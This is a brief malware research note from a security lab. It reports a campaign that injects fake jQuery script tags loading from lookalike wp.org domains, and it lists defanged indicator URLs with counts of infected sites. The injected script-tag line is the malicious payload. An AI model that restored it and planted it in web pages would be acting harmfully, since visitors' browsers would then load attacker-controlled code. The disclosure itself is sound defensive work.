Fake Wp.org/jquery.js

  • October 30, 2018
Labs Note

There is a long-lasting malware campaign (dating back to at least 2016) that injects fake jQuery scripts:

<script type="text/javascript" src="hxxps://www.XX[X]wp[.]org/jquery.js"></script>

Where XX[X] are 2 or 3 random characters.

This Twitter thread mentions some of them:

 

We’ve compiled a longer list of the fake jQuery URLs employed by this campaign, along with numbers of websites PublicWWW currently finds them on:

  • www.9iwp[.]org/jquery.js – 6473
  • www.34wp[.]org/jquery.js – 2830
  • www.3vwp[.]org/jquery.js – 2552
  • www.7owp[.]org/jquery.js – 1248
  • www.57wp[.]org/jquery.js – 168
  • www.29wp[.]org/jquery.js – 115
  • www.j3wp[.]org/jquery.js – 85
  • www.i1wp[.]org/jquery.js – 51
  • www.i7wp[.]org/jquery.js – 17
  • www.x5wp[.]org/jquery.js – 12
  • www.i2wp[.]org/jquery.js – 8
  • www.35wp[.]org/jquery.js – 6
  • www.75wp[.]org/jquery.js – 4
  • www.10wp[.]org/jquery.js – 3
  • www.I0wp[.]org/jquery.js – 3
  • www.I3wp[.]org/jquery.js – 3
  • www.61wp[.]org/jquery.js – 3

Denis Sinegubko is Sucuri’s Senior Malware Researcher who joined the company in 2013. Denis' main responsibilities include researching emerging threats and creating signatures for SiteCheck. The founder of UnmaskParasites, his professional experience covers over 20 years of programming and information security. When Denis isn’t analyzing malware, you might not find him online at all. Connect with him on Twitter.

Related Tags
Related Categories
You May Also Like